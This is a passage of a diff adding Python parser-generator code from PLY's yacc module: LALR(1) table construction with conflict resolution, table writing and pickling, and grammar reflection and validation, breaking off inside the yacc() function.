+            F[stack[-1]] = F[x]
+            element = stack.pop()
+
+class LALRError(YaccError):
+    pass
+
+# -----------------------------------------------------------------------------
+# == LRGeneratedTable ==
+#
+# This class implements the LR table generation algorithm.  There are no
+# public methods except for write_table() and pickle_table().
+# -----------------------------------------------------------------------------
+
+class LRGeneratedTable(LRTable):
+    def __init__(self, grammar, method='LALR', log=None):
+        if method not in ['SLR', 'LALR']:
+            raise LALRError('Unsupported method %s' % method)
+
+        self.grammar = grammar
+        self.lr_method = method
+
+        # Set up the logger
+        if not log:
+            log = NullLogger()
+        self.log = log
+
+        # Internal attributes
+        self.lr_action = {}                          # Action table
+        self.lr_goto = {}                            # Goto table
+        self.lr_productions = grammar.Productions    # Reference to grammar Production array
+        self.lr_goto_cache = {}                      # Cache of computed gotos
+        self.lr0_cidhash = {}                        # Cache of closures
+
+        self._add_count = 0                          # Internal counter used to detect cycles
+
+        # Diagnostic information filled in by the table generator
+        self.sr_conflict = 0
+        self.rr_conflict = 0
+        self.conflicts = []                          # List of conflicts
+
+        self.sr_conflicts = []
+        self.rr_conflicts = []
+
+        # Build the tables
+        self.grammar.build_lritems()
+        self.grammar.compute_first()
+        self.grammar.compute_follow()
+        self.lr_parse_table()
+
+    # Compute the LR(0) closure operation on I, where I is a set of LR(0) items.
+
+    def lr0_closure(self, I):
+        self._add_count += 1
+
+        # Add everything in I to J
+        J = I[:]
+        didadd = True
+        while didadd:
+            didadd = False
+            for j in J:
+                for x in j.lr_after:
+                    if getattr(x, 'lr0_added', 0) == self._add_count:
+                        continue
+                    # Add B --> .G to J
+                    J.append(x.lr_next)
+                    x.lr0_added = self._add_count
+                    didadd = True
+
+        return J
+
+    # Compute the LR(0) goto function goto(I,X) where I is a set
+    # of LR(0) items and X is a grammar symbol.  This function is written
+    # in a way that guarantees uniqueness of the generated goto sets
+    # (i.e. the same goto set will never be returned as two different Python
+    # objects).  With uniqueness, we can later do fast set comparisons using
+    # id(obj) instead of element-wise comparison.
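+    #
+    # For example, two calls with the same item set and symbol hand back the
+    # identical object, so callers may safely write:
+    #
+    #     g1 = self.lr0_goto(I, 'expr')   # 'expr' is a hypothetical symbol
+    #     g2 = self.lr0_goto(I, 'expr')
+    #     assert g1 is g2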
+
+    def lr0_goto(self, I, x):
+        # First we look for a previously cached entry
+        g = self.lr_goto_cache.get((id(I), x))
+        if g:
+            return g
+
+        # Now we generate the goto set in a way that guarantees uniqueness
+        # of the result
+
+        s = self.lr_goto_cache.get(x)
+        if not s:
+            s = {}
+            self.lr_goto_cache[x] = s
+
+        gs = []
+        for p in I:
+            n = p.lr_next
+            if n and n.lr_before == x:
+                s1 = s.get(id(n))
+                if not s1:
+                    s1 = {}
+                    s[id(n)] = s1
+                gs.append(n)
+                s = s1
+        g = s.get('$end')
+        if not g:
+            if gs:
+                g = self.lr0_closure(gs)
+                s['$end'] = g
+            else:
+                s['$end'] = gs
+        self.lr_goto_cache[(id(I), x)] = g
+        return g
+
+    # Compute the LR(0) sets of item function
+    def lr0_items(self):
+        C = [self.lr0_closure([self.grammar.Productions[0].lr_next])]
+        i = 0
+        for I in C:
+            self.lr0_cidhash[id(I)] = i
+            i += 1
+
+        # Loop over the items in C and each grammar symbol
+        i = 0
+        while i < len(C):
+            I = C[i]
+            i += 1
+
+            # Collect all of the symbols that could possibly be in the goto(I,X) sets
+            asyms = {}
+            for ii in I:
+                for s in ii.usyms:
+                    asyms[s] = None
+
+            for x in asyms:
+                g = self.lr0_goto(I, x)
+                if not g or id(g) in self.lr0_cidhash:
+                    continue
+                self.lr0_cidhash[id(g)] = len(C)
+                C.append(g)
+
+        return C
+
+    # -----------------------------------------------------------------------------
+    # ==== LALR(1) Parsing ====
+    #
+    # LALR(1) parsing is almost exactly the same as SLR except that instead of
+    # relying upon Follow() sets when performing reductions, a more selective
+    # lookahead set that incorporates the state of the LR(0) machine is utilized.
+    # Thus, we mainly just have to focus on calculating the lookahead sets.
+    #
+    # The method used here is due to DeRemer and Pennello (1982).
+    #
+    #     DeRemer, F. L., and T. J. Pennello: "Efficient Computation of LALR(1)
+    #     Lookahead Sets", ACM Transactions on Programming Languages and Systems,
+    #     Vol. 4, No. 4, Oct. 1982, pp. 615-649
+    #
+    # Further details can also be found in:
+    #
+    #     J. Tremblay and P. Sorenson, "The Theory and Practice of Compiler Writing",
+    #     McGraw-Hill Book Company, (1985).
+    # -----------------------------------------------------------------------------
+
+    # -----------------------------------------------------------------------------
+    # compute_nullable_nonterminals()
+    #
+    # Creates a set containing all of the non-terminals that might produce
+    # an empty production.
+    # -----------------------------------------------------------------------------
+
+    def compute_nullable_nonterminals(self):
+        nullable = set()
+        num_nullable = 0
+        while True:
+            for p in self.grammar.Productions[1:]:
+                if p.len == 0:
+                    nullable.add(p.name)
+                    continue
+                for t in p.prod:
+                    if t not in nullable:
+                        break
+                else:
+                    nullable.add(p.name)
+            if len(nullable) == num_nullable:
+                break
+            num_nullable = len(nullable)
+        return nullable
+
+    # -----------------------------------------------------------------------------
+    # find_nonterminal_transitions(C)
+    #
+    # Given a set of LR(0) items, this function finds all of the non-terminal
+    # transitions.  These are transitions in which a dot appears immediately before
+    # a non-terminal.  Returns a list of tuples of the form (state, N) where state
+    # is the state number and N is the nonterminal symbol.
+    #
+    # The input C is the set of LR(0) items.
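+    #
+    # For example, with a hypothetical grammar, a state 3 containing the item
+    # 'stmt -> IF . expr THEN stmt' contributes the pair (3, 'expr'), while
+    # items whose dot precedes a terminal contribute nothing.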
+ # ----------------------------------------------------------------------------- + + def find_nonterminal_transitions(self, C): + trans = [] + for stateno, state in enumerate(C): + for p in state: + if p.lr_index < p.len - 1: + t = (stateno, p.prod[p.lr_index+1]) + if t[1] in self.grammar.Nonterminals: + if t not in trans: + trans.append(t) + return trans + + # ----------------------------------------------------------------------------- + # dr_relation() + # + # Computes the DR(p,A) relationships for non-terminal transitions. The input + # is a tuple (state,N) where state is a number and N is a nonterminal symbol. + # + # Returns a list of terminals. + # ----------------------------------------------------------------------------- + + def dr_relation(self, C, trans, nullable): + dr_set = {} + state, N = trans + terms = [] + + g = self.lr0_goto(C[state], N) + for p in g: + if p.lr_index < p.len - 1: + a = p.prod[p.lr_index+1] + if a in self.grammar.Terminals: + if a not in terms: + terms.append(a) + + # This extra bit is to handle the start state + if state == 0 and N == self.grammar.Productions[0].prod[0]: + terms.append('$end') + + return terms + + # ----------------------------------------------------------------------------- + # reads_relation() + # + # Computes the READS() relation (p,A) READS (t,C). + # ----------------------------------------------------------------------------- + + def reads_relation(self, C, trans, empty): + # Look for empty transitions + rel = [] + state, N = trans + + g = self.lr0_goto(C[state], N) + j = self.lr0_cidhash.get(id(g), -1) + for p in g: + if p.lr_index < p.len - 1: + a = p.prod[p.lr_index + 1] + if a in empty: + rel.append((j, a)) + + return rel + + # ----------------------------------------------------------------------------- + # compute_lookback_includes() + # + # Determines the lookback and includes relations + # + # LOOKBACK: + # + # This relation is determined by running the LR(0) state machine forward. + # For example, starting with a production "N : . A B C", we run it forward + # to obtain "N : A B C ." We then build a relationship between this final + # state and the starting state. These relationships are stored in a dictionary + # lookdict. + # + # INCLUDES: + # + # Computes the INCLUDE() relation (p,A) INCLUDES (p',B). + # + # This relation is used to determine non-terminal transitions that occur + # inside of other non-terminal transition states. (p,A) INCLUDES (p', B) + # if the following holds: + # + # B -> LAT, where T -> epsilon and p' -L-> p + # + # L is essentially a prefix (which may be empty), T is a suffix that must be + # able to derive an empty string. State p' must lead to state p with the string L. + # + # ----------------------------------------------------------------------------- + + def compute_lookback_includes(self, C, trans, nullable): + lookdict = {} # Dictionary of lookback relations + includedict = {} # Dictionary of include relations + + # Make a dictionary of non-terminal transitions + dtrans = {} + for t in trans: + dtrans[t] = 1 + + # Loop over all transitions and compute lookbacks and includes + for state, N in trans: + lookb = [] + includes = [] + for p in C[state]: + if p.name != N: + continue + + # Okay, we have a name match. We now follow the production all the way + # through the state machine until we get the . 
on the right hand side + + lr_index = p.lr_index + j = state + while lr_index < p.len - 1: + lr_index = lr_index + 1 + t = p.prod[lr_index] + + # Check to see if this symbol and state are a non-terminal transition + if (j, t) in dtrans: + # Yes. Okay, there is some chance that this is an includes relation + # the only way to know for certain is whether the rest of the + # production derives empty + + li = lr_index + 1 + while li < p.len: + if p.prod[li] in self.grammar.Terminals: + break # No forget it + if p.prod[li] not in nullable: + break + li = li + 1 + else: + # Appears to be a relation between (j,t) and (state,N) + includes.append((j, t)) + + g = self.lr0_goto(C[j], t) # Go to next set + j = self.lr0_cidhash.get(id(g), -1) # Go to next state + + # When we get here, j is the final state, now we have to locate the production + for r in C[j]: + if r.name != p.name: + continue + if r.len != p.len: + continue + i = 0 + # This look is comparing a production ". A B C" with "A B C ." + while i < r.lr_index: + if r.prod[i] != p.prod[i+1]: + break + i = i + 1 + else: + lookb.append((j, r)) + for i in includes: + if i not in includedict: + includedict[i] = [] + includedict[i].append((state, N)) + lookdict[(state, N)] = lookb + + return lookdict, includedict + + # ----------------------------------------------------------------------------- + # compute_read_sets() + # + # Given a set of LR(0) items, this function computes the read sets. + # + # Inputs: C = Set of LR(0) items + # ntrans = Set of nonterminal transitions + # nullable = Set of empty transitions + # + # Returns a set containing the read sets + # ----------------------------------------------------------------------------- + + def compute_read_sets(self, C, ntrans, nullable): + FP = lambda x: self.dr_relation(C, x, nullable) + R = lambda x: self.reads_relation(C, x, nullable) + F = digraph(ntrans, R, FP) + return F + + # ----------------------------------------------------------------------------- + # compute_follow_sets() + # + # Given a set of LR(0) items, a set of non-terminal transitions, a readset, + # and an include set, this function computes the follow sets + # + # Follow(p,A) = Read(p,A) U U {Follow(p',B) | (p,A) INCLUDES (p',B)} + # + # Inputs: + # ntrans = Set of nonterminal transitions + # readsets = Readset (previously computed) + # inclsets = Include sets (previously computed) + # + # Returns a set containing the follow sets + # ----------------------------------------------------------------------------- + + def compute_follow_sets(self, ntrans, readsets, inclsets): + FP = lambda x: readsets[x] + R = lambda x: inclsets.get(x, []) + F = digraph(ntrans, R, FP) + return F + + # ----------------------------------------------------------------------------- + # add_lookaheads() + # + # Attaches the lookahead symbols to grammar rules. 
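+    #
+    # After this pass, a production p reduced in some state carries
+    # p.lookaheads[state]; e.g. (hypothetical numbers) a value of
+    # {11: ['PLUS', '$end']} means rule p is reduced in state 11 only when
+    # the lookahead is PLUS or $end.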
+ # + # Inputs: lookbacks - Set of lookback relations + # followset - Computed follow set + # + # This function directly attaches the lookaheads to productions contained + # in the lookbacks set + # ----------------------------------------------------------------------------- + + def add_lookaheads(self, lookbacks, followset): + for trans, lb in lookbacks.items(): + # Loop over productions in lookback + for state, p in lb: + if state not in p.lookaheads: + p.lookaheads[state] = [] + f = followset.get(trans, []) + for a in f: + if a not in p.lookaheads[state]: + p.lookaheads[state].append(a) + + # ----------------------------------------------------------------------------- + # add_lalr_lookaheads() + # + # This function does all of the work of adding lookahead information for use + # with LALR parsing + # ----------------------------------------------------------------------------- + + def add_lalr_lookaheads(self, C): + # Determine all of the nullable nonterminals + nullable = self.compute_nullable_nonterminals() + + # Find all non-terminal transitions + trans = self.find_nonterminal_transitions(C) + + # Compute read sets + readsets = self.compute_read_sets(C, trans, nullable) + + # Compute lookback/includes relations + lookd, included = self.compute_lookback_includes(C, trans, nullable) + + # Compute LALR FOLLOW sets + followsets = self.compute_follow_sets(trans, readsets, included) + + # Add all of the lookaheads + self.add_lookaheads(lookd, followsets) + + # ----------------------------------------------------------------------------- + # lr_parse_table() + # + # This function constructs the parse tables for SLR or LALR + # ----------------------------------------------------------------------------- + def lr_parse_table(self): + Productions = self.grammar.Productions + Precedence = self.grammar.Precedence + goto = self.lr_goto # Goto array + action = self.lr_action # Action array + log = self.log # Logger for output + + actionp = {} # Action production array (temporary) + + log.info('Parsing method: %s', self.lr_method) + + # Step 1: Construct C = { I0, I1, ... IN}, collection of LR(0) items + # This determines the number of states + + C = self.lr0_items() + + if self.lr_method == 'LALR': + self.add_lalr_lookaheads(C) + + # Build the parser table, state by state + st = 0 + for I in C: + # Loop over each production in I + actlist = [] # List of actions + st_action = {} + st_actionp = {} + st_goto = {} + log.info('') + log.info('state %d', st) + log.info('') + for p in I: + log.info(' (%d) %s', p.number, p) + log.info('') + + for p in I: + if p.len == p.lr_index + 1: + if p.name == "S'": + # Start symbol. Accept! + st_action['$end'] = 0 + st_actionp['$end'] = p + else: + # We are at the end of a production. Reduce! + if self.lr_method == 'LALR': + laheads = p.lookaheads[st] + else: + laheads = self.grammar.Follow[p.name] + for a in laheads: + actlist.append((a, p, 'reduce using rule %d (%s)' % (p.number, p))) + r = st_action.get(a) + if r is not None: + # Whoa. Have a shift/reduce or reduce/reduce conflict + if r > 0: + # Need to decide on shift or reduce here + # By default we favor shifting. Need to add + # some precedence rules here. + + # Shift precedence comes from the token + sprec, slevel = Precedence.get(a, ('right', 0)) + + # Reduce precedence comes from rule being reduced (p) + rprec, rlevel = Productions[p.number].prec + + if (slevel < rlevel) or ((slevel == rlevel) and (rprec == 'left')): + # We really need to reduce here. 
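+                                    # Illustrative case (hypothetical grammar):
+                                    # with precedence = (('left', 'PLUS'),),
+                                    # reducing 'expr -> expr PLUS expr .' on a
+                                    # lookahead PLUS gives slevel == rlevel and
+                                    # rprec == 'left', so the reduction wins,
+                                    # which is exactly left associativity.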
+ st_action[a] = -p.number + st_actionp[a] = p + if not slevel and not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as reduce', a) + self.sr_conflicts.append((st, a, 'reduce')) + Productions[p.number].reduced += 1 + elif (slevel == rlevel) and (rprec == 'nonassoc'): + st_action[a] = None + else: + # Hmmm. Guess we'll keep the shift + if not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as shift', a) + self.sr_conflicts.append((st, a, 'shift')) + elif r < 0: + # Reduce/reduce conflict. In this case, we favor the rule + # that was defined first in the grammar file + oldp = Productions[-r] + pp = Productions[p.number] + if oldp.line > pp.line: + st_action[a] = -p.number + st_actionp[a] = p + chosenp, rejectp = pp, oldp + Productions[p.number].reduced += 1 + Productions[oldp.number].reduced -= 1 + else: + chosenp, rejectp = oldp, pp + self.rr_conflicts.append((st, chosenp, rejectp)) + log.info(' ! reduce/reduce conflict for %s resolved using rule %d (%s)', + a, st_actionp[a].number, st_actionp[a]) + else: + raise LALRError('Unknown conflict in state %d' % st) + else: + st_action[a] = -p.number + st_actionp[a] = p + Productions[p.number].reduced += 1 + else: + i = p.lr_index + a = p.prod[i+1] # Get symbol right after the "." + if a in self.grammar.Terminals: + g = self.lr0_goto(I, a) + j = self.lr0_cidhash.get(id(g), -1) + if j >= 0: + # We are in a shift state + actlist.append((a, p, 'shift and go to state %d' % j)) + r = st_action.get(a) + if r is not None: + # Whoa have a shift/reduce or shift/shift conflict + if r > 0: + if r != j: + raise LALRError('Shift/shift conflict in state %d' % st) + elif r < 0: + # Do a precedence check. + # - if precedence of reduce rule is higher, we reduce. + # - if precedence of reduce is same and left assoc, we reduce. + # - otherwise we shift + + # Shift precedence comes from the token + sprec, slevel = Precedence.get(a, ('right', 0)) + + # Reduce precedence comes from the rule that could have been reduced + rprec, rlevel = Productions[st_actionp[a].number].prec + + if (slevel > rlevel) or ((slevel == rlevel) and (rprec == 'right')): + # We decide to shift here... highest precedence to shift + Productions[st_actionp[a].number].reduced -= 1 + st_action[a] = j + st_actionp[a] = p + if not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as shift', a) + self.sr_conflicts.append((st, a, 'shift')) + elif (slevel == rlevel) and (rprec == 'nonassoc'): + st_action[a] = None + else: + # Hmmm. Guess we'll keep the reduce + if not slevel and not rlevel: + log.info(' ! shift/reduce conflict for %s resolved as reduce', a) + self.sr_conflicts.append((st, a, 'reduce')) + + else: + raise LALRError('Unknown conflict in state %d' % st) + else: + st_action[a] = j + st_actionp[a] = p + + # Print the actions associated with each terminal + _actprint = {} + for a, p, m in actlist: + if a in st_action: + if p is st_actionp[a]: + log.info(' %-15s %s', a, m) + _actprint[(a, m)] = 1 + log.info('') + # Print the actions that were not used. (debugging) + not_used = 0 + for a, p, m in actlist: + if a in st_action: + if p is not st_actionp[a]: + if not (a, m) in _actprint: + log.debug(' ! 
%-15s [ %s ]', a, m) + not_used = 1 + _actprint[(a, m)] = 1 + if not_used: + log.debug('') + + # Construct the goto table for this state + + nkeys = {} + for ii in I: + for s in ii.usyms: + if s in self.grammar.Nonterminals: + nkeys[s] = None + for n in nkeys: + g = self.lr0_goto(I, n) + j = self.lr0_cidhash.get(id(g), -1) + if j >= 0: + st_goto[n] = j + log.info(' %-30s shift and go to state %d', n, j) + + action[st] = st_action + actionp[st] = st_actionp + goto[st] = st_goto + st += 1 + + # ----------------------------------------------------------------------------- + # write() + # + # This function writes the LR parsing tables to a file + # ----------------------------------------------------------------------------- + + def write_table(self, tabmodule, outputdir='', signature=''): + if isinstance(tabmodule, types.ModuleType): + raise IOError("Won't overwrite existing tabmodule") + + basemodulename = tabmodule.split('.')[-1] + filename = os.path.join(outputdir, basemodulename) + '.py' + try: + f = open(filename, 'w') + + f.write(''' +# %s +# This file is automatically generated. Do not edit. +_tabversion = %r + +_lr_method = %r + +_lr_signature = %r + ''' % (os.path.basename(filename), __tabversion__, self.lr_method, signature)) + + # Change smaller to 0 to go back to original tables + smaller = 1 + + # Factor out names to try and make smaller + if smaller: + items = {} + + for s, nd in self.lr_action.items(): + for name, v in nd.items(): + i = items.get(name) + if not i: + i = ([], []) + items[name] = i + i[0].append(s) + i[1].append(v) + + f.write('\n_lr_action_items = {') + for k, v in items.items(): + f.write('%r:([' % k) + for i in v[0]: + f.write('%r,' % i) + f.write('],[') + for i in v[1]: + f.write('%r,' % i) + + f.write(']),') + f.write('}\n') + + f.write(''' +_lr_action = {} +for _k, _v in _lr_action_items.items(): + for _x,_y in zip(_v[0],_v[1]): + if not _x in _lr_action: _lr_action[_x] = {} + _lr_action[_x][_k] = _y +del _lr_action_items +''') + + else: + f.write('\n_lr_action = { ') + for k, v in self.lr_action.items(): + f.write('(%r,%r):%r,' % (k[0], k[1], v)) + f.write('}\n') + + if smaller: + # Factor out names to try and make smaller + items = {} + + for s, nd in self.lr_goto.items(): + for name, v in nd.items(): + i = items.get(name) + if not i: + i = ([], []) + items[name] = i + i[0].append(s) + i[1].append(v) + + f.write('\n_lr_goto_items = {') + for k, v in items.items(): + f.write('%r:([' % k) + for i in v[0]: + f.write('%r,' % i) + f.write('],[') + for i in v[1]: + f.write('%r,' % i) + + f.write(']),') + f.write('}\n') + + f.write(''' +_lr_goto = {} +for _k, _v in _lr_goto_items.items(): + for _x, _y in zip(_v[0], _v[1]): + if not _x in _lr_goto: _lr_goto[_x] = {} + _lr_goto[_x][_k] = _y +del _lr_goto_items +''') + else: + f.write('\n_lr_goto = { ') + for k, v in self.lr_goto.items(): + f.write('(%r,%r):%r,' % (k[0], k[1], v)) + f.write('}\n') + + # Write production table + f.write('_lr_productions = [\n') + for p in self.lr_productions: + if p.func: + f.write(' (%r,%r,%d,%r,%r,%d),\n' % (p.str, p.name, p.len, + p.func, os.path.basename(p.file), p.line)) + else: + f.write(' (%r,%r,%d,None,None,None),\n' % (str(p), p.name, p.len)) + f.write(']\n') + f.close() + + except IOError as e: + raise + + + # ----------------------------------------------------------------------------- + # pickle_table() + # + # This function pickles the LR parsing tables to a supplied file object + # ----------------------------------------------------------------------------- + + def 
pickle_table(self, filename, signature=''): + try: + import cPickle as pickle + except ImportError: + import pickle + with open(filename, 'wb') as outf: + pickle.dump(__tabversion__, outf, pickle_protocol) + pickle.dump(self.lr_method, outf, pickle_protocol) + pickle.dump(signature, outf, pickle_protocol) + pickle.dump(self.lr_action, outf, pickle_protocol) + pickle.dump(self.lr_goto, outf, pickle_protocol) + + outp = [] + for p in self.lr_productions: + if p.func: + outp.append((p.str, p.name, p.len, p.func, os.path.basename(p.file), p.line)) + else: + outp.append((str(p), p.name, p.len, None, None, None)) + pickle.dump(outp, outf, pickle_protocol) + +# ----------------------------------------------------------------------------- +# === INTROSPECTION === +# +# The following functions and classes are used to implement the PLY +# introspection features followed by the yacc() function itself. +# ----------------------------------------------------------------------------- + +# ----------------------------------------------------------------------------- +# get_caller_module_dict() +# +# This function returns a dictionary containing all of the symbols defined within +# a caller further down the call stack. This is used to get the environment +# associated with the yacc() call if none was provided. +# ----------------------------------------------------------------------------- + +def get_caller_module_dict(levels): + f = sys._getframe(levels) + ldict = f.f_globals.copy() + if f.f_globals != f.f_locals: + ldict.update(f.f_locals) + return ldict + +# ----------------------------------------------------------------------------- +# parse_grammar() +# +# This takes a raw grammar rule string and parses it into production data +# ----------------------------------------------------------------------------- +def parse_grammar(doc, file, line): + grammar = [] + # Split the doc string into lines + pstrings = doc.splitlines() + lastp = None + dline = line + for ps in pstrings: + dline += 1 + p = ps.split() + if not p: + continue + try: + if p[0] == '|': + # This is a continuation of a previous rule + if not lastp: + raise SyntaxError("%s:%d: Misplaced '|'" % (file, dline)) + prodname = lastp + syms = p[1:] + else: + prodname = p[0] + lastp = prodname + syms = p[2:] + assign = p[1] + if assign != ':' and assign != '::=': + raise SyntaxError("%s:%d: Syntax error. Expected ':'" % (file, dline)) + + grammar.append((file, dline, prodname, syms)) + except SyntaxError: + raise + except Exception: + raise SyntaxError('%s:%d: Syntax error in rule %r' % (file, dline, ps.strip())) + + return grammar + +# ----------------------------------------------------------------------------- +# ParserReflect() +# +# This class represents information extracted for building a parser including +# start symbol, error function, tokens, precedence list, action functions, +# etc. 
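+#
+# For orientation, a minimal grammar module of the kind this reflection step
+# introspects might look like the following (an illustrative sketch, not part
+# of PLY itself):
+#
+#     tokens = ('NUMBER', 'PLUS')
+#
+#     def p_expr_plus(p):
+#         'expr : expr PLUS NUMBER'
+#         p[0] = p[1] + p[3]
+#
+#     def p_expr_number(p):
+#         'expr : NUMBER'
+#         p[0] = p[1]
+#
+#     def p_error(p):
+#         print('Syntax error at', p)
+#
+# parse_grammar() above reduces each docstring to (file, line, prodname, syms)
+# tuples, and ParserReflect collects those together with 'start', 'tokens',
+# 'precedence', and 'p_error' out of the supplied module dictionary.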
+# ----------------------------------------------------------------------------- +class ParserReflect(object): + def __init__(self, pdict, log=None): + self.pdict = pdict + self.start = None + self.error_func = None + self.tokens = None + self.modules = set() + self.grammar = [] + self.error = False + + if log is None: + self.log = PlyLogger(sys.stderr) + else: + self.log = log + + # Get all of the basic information + def get_all(self): + self.get_start() + self.get_error_func() + self.get_tokens() + self.get_precedence() + self.get_pfunctions() + + # Validate all of the information + def validate_all(self): + self.validate_start() + self.validate_error_func() + self.validate_tokens() + self.validate_precedence() + self.validate_pfunctions() + self.validate_modules() + return self.error + + # Compute a signature over the grammar + def signature(self): + parts = [] + try: + if self.start: + parts.append(self.start) + if self.prec: + parts.append(''.join([''.join(p) for p in self.prec])) + if self.tokens: + parts.append(' '.join(self.tokens)) + for f in self.pfuncs: + if f[3]: + parts.append(f[3]) + except (TypeError, ValueError): + pass + return ''.join(parts) + + # ----------------------------------------------------------------------------- + # validate_modules() + # + # This method checks to see if there are duplicated p_rulename() functions + # in the parser module file. Without this function, it is really easy for + # users to make mistakes by cutting and pasting code fragments (and it's a real + # bugger to try and figure out why the resulting parser doesn't work). Therefore, + # we just do a little regular expression pattern matching of def statements + # to try and detect duplicates. + # ----------------------------------------------------------------------------- + + def validate_modules(self): + # Match def p_funcname( + fre = re.compile(r'\s*def\s+(p_[a-zA-Z_0-9]*)\(') + + for module in self.modules: + try: + lines, linen = inspect.getsourcelines(module) + except IOError: + continue + + counthash = {} + for linen, line in enumerate(lines): + linen += 1 + m = fre.match(line) + if m: + name = m.group(1) + prev = counthash.get(name) + if not prev: + counthash[name] = linen + else: + filename = inspect.getsourcefile(module) + self.log.warning('%s:%d: Function %s redefined. 
Previously defined on line %d', + filename, linen, name, prev) + + # Get the start symbol + def get_start(self): + self.start = self.pdict.get('start') + + # Validate the start symbol + def validate_start(self): + if self.start is not None: + if not isinstance(self.start, string_types): + self.log.error("'start' must be a string") + + # Look for error handler + def get_error_func(self): + self.error_func = self.pdict.get('p_error') + + # Validate the error function + def validate_error_func(self): + if self.error_func: + if isinstance(self.error_func, types.FunctionType): + ismethod = 0 + elif isinstance(self.error_func, types.MethodType): + ismethod = 1 + else: + self.log.error("'p_error' defined, but is not a function or method") + self.error = True + return + + eline = self.error_func.__code__.co_firstlineno + efile = self.error_func.__code__.co_filename + module = inspect.getmodule(self.error_func) + self.modules.add(module) + + argcount = self.error_func.__code__.co_argcount - ismethod + if argcount != 1: + self.log.error('%s:%d: p_error() requires 1 argument', efile, eline) + self.error = True + + # Get the tokens map + def get_tokens(self): + tokens = self.pdict.get('tokens') + if not tokens: + self.log.error('No token list is defined') + self.error = True + return + + if not isinstance(tokens, (list, tuple)): + self.log.error('tokens must be a list or tuple') + self.error = True + return + + if not tokens: + self.log.error('tokens is empty') + self.error = True + return + + self.tokens = tokens + + # Validate the tokens + def validate_tokens(self): + # Validate the tokens. + if 'error' in self.tokens: + self.log.error("Illegal token name 'error'. Is a reserved word") + self.error = True + return + + terminals = set() + for n in self.tokens: + if n in terminals: + self.log.warning('Token %r multiply defined', n) + terminals.add(n) + + # Get the precedence map (if any) + def get_precedence(self): + self.prec = self.pdict.get('precedence') + + # Validate and parse the precedence map + def validate_precedence(self): + preclist = [] + if self.prec: + if not isinstance(self.prec, (list, tuple)): + self.log.error('precedence must be a list or tuple') + self.error = True + return + for level, p in enumerate(self.prec): + if not isinstance(p, (list, tuple)): + self.log.error('Bad precedence table') + self.error = True + return + + if len(p) < 2: + self.log.error('Malformed precedence entry %s. 
Must be (assoc, term, ..., term)', p) + self.error = True + return + assoc = p[0] + if not isinstance(assoc, string_types): + self.log.error('precedence associativity must be a string') + self.error = True + return + for term in p[1:]: + if not isinstance(term, string_types): + self.log.error('precedence items must be strings') + self.error = True + return + preclist.append((term, assoc, level+1)) + self.preclist = preclist + + # Get all p_functions from the grammar + def get_pfunctions(self): + p_functions = [] + for name, item in self.pdict.items(): + if not name.startswith('p_') or name == 'p_error': + continue + if isinstance(item, (types.FunctionType, types.MethodType)): + line = getattr(item, 'co_firstlineno', item.__code__.co_firstlineno) + module = inspect.getmodule(item) + p_functions.append((line, module, name, item.__doc__)) + + # Sort all of the actions by line number; make sure to stringify + # modules to make them sortable, since `line` may not uniquely sort all + # p functions + p_functions.sort(key=lambda p_function: ( + p_function[0], + str(p_function[1]), + p_function[2], + p_function[3])) + self.pfuncs = p_functions + + # Validate all of the p_functions + def validate_pfunctions(self): + grammar = [] + # Check for non-empty symbols + if len(self.pfuncs) == 0: + self.log.error('no rules of the form p_rulename are defined') + self.error = True + return + + for line, module, name, doc in self.pfuncs: + file = inspect.getsourcefile(module) + func = self.pdict[name] + if isinstance(func, types.MethodType): + reqargs = 2 + else: + reqargs = 1 + if func.__code__.co_argcount > reqargs: + self.log.error('%s:%d: Rule %r has too many arguments', file, line, func.__name__) + self.error = True + elif func.__code__.co_argcount < reqargs: + self.log.error('%s:%d: Rule %r requires an argument', file, line, func.__name__) + self.error = True + elif not func.__doc__: + self.log.warning('%s:%d: No documentation string specified in function %r (ignored)', + file, line, func.__name__) + else: + try: + parsed_g = parse_grammar(doc, file, line) + for g in parsed_g: + grammar.append((name, g)) + except SyntaxError as e: + self.log.error(str(e)) + self.error = True + + # Looks like a valid grammar rule + # Mark the file in which defined. + self.modules.add(module) + + # Secondary validation step that looks for p_ definitions that are not functions + # or functions that look like they might be grammar rules. 
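+        # An illustrative case (not from PLY itself) of what this scan flags:
+        #
+        #     def expr_stmt(p):              # p_ prefix forgotten
+        #         'statement : expr SEMI'
+        #         p[0] = p[1]
+        #
+        # takes one argument and has a docstring whose second space-separated
+        # token is ':', so the check below warns that it is a possible grammar
+        # rule defined without the p_ prefix.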
+ + for n, v in self.pdict.items(): + if n.startswith('p_') and isinstance(v, (types.FunctionType, types.MethodType)): + continue + if n.startswith('t_'): + continue + if n.startswith('p_') and n != 'p_error': + self.log.warning('%r not defined as a function', n) + if ((isinstance(v, types.FunctionType) and v.__code__.co_argcount == 1) or + (isinstance(v, types.MethodType) and v.__func__.__code__.co_argcount == 2)): + if v.__doc__: + try: + doc = v.__doc__.split(' ') + if doc[1] == ':': + self.log.warning('%s:%d: Possible grammar rule %r defined without p_ prefix', + v.__code__.co_filename, v.__code__.co_firstlineno, n) + except IndexError: + pass + + self.grammar = grammar + +# ----------------------------------------------------------------------------- +# yacc(module) +# +# Build a parser +# ----------------------------------------------------------------------------- + +def yacc(method='LALR', debug=yaccdebug, module=None, tabmodule=tab_module, start=None, + check_recursion=True, optimize=False, write_tables=True, debugfile=debug_file, + outputdir=None, debuglog=None, errorlog=None, picklefile=None): + + if tabmodule is None: + tabmodule = tab_module + + # Reference to the parsing method of the last built parser + global parse + + # If pickling is enabled, table files are not created + if picklefile: + write_tables = 0 + + if errorlog is None: + errorlog = PlyLogger(sys.stderr) + + # Get the module dictionary used for the parser + if module: + _items = [(k, getattr(module, k)) for k in dir(module)] + pdict = dict(_items) + # If no __file__ attribute is available, try to obtain it from the __module__ instead + if '__file__' not in pdict: + pdict['__file__'] = sys.modules[pdict['__module__']].__file__ + else: + pdict = get_caller_module_dict(2) + + if outputdir is None: + # If no output directory is set, the location of the output files + # is determined according to the following rules: + # - If tabmodule specifies a package, files go into that package directory + # - Otherwise, files go in the same directory as the specifying module + if isinstance(tabmodule, types.ModuleType): + srcfile = tabmodule.__file__ + else: + if '.' not in tabmodule: + srcfile = pdict['__file__'] + else: + parts = tabmodule.split('.') + pkgname = '.'.join(parts[:-1]) + exec('import %s' % pkgname) + srcfile = getattr(sys.modules[pkgname], '__file__', '') + outputdir = os.path.dirname(srcfile) + + # Determine if the module is package of a package or not. + # If so, fix the tabmodule setting so that tables load correctly + pkg = pdict.get('__package__') + if 